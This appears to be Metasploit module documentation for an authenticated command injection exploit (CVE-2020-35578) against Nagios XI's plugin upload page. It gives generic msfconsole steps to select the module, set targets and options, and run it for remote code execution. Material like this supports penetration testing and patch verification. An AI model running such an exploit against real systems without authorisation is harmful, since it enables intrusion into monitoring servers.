This module exploits a command injection vulnerability (CVE-2020-35578) in the `/admin/monitoringplugins.php`
page of Nagios XI versions prior to 5.8.0 when uploading plugins. Successful exploitation allows
an authenticated admin user to achieve remote code execution as the `apache` user by uploading
a malicious plugin.
Valid credentials for a Nagios XI admin user are required. This module has
been successfully tested against Nagios versions XI 5.3.0 and 5.7.5, both
running on CentOS 7.
msf > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
msf exploit(nagios_xi_plugins_filename_authenticated_rce) > show targets
...targets...
msf exploit(nagios_xi_plugins_filename_authenticated_rce) > set TARGET < target-id >
msf exploit(nagios_xi_plugins_filename_authenticated_rce) > show options
...show and set options...
msf exploit(nagios_xi_plugins_filename_authenticated_rce) > exploit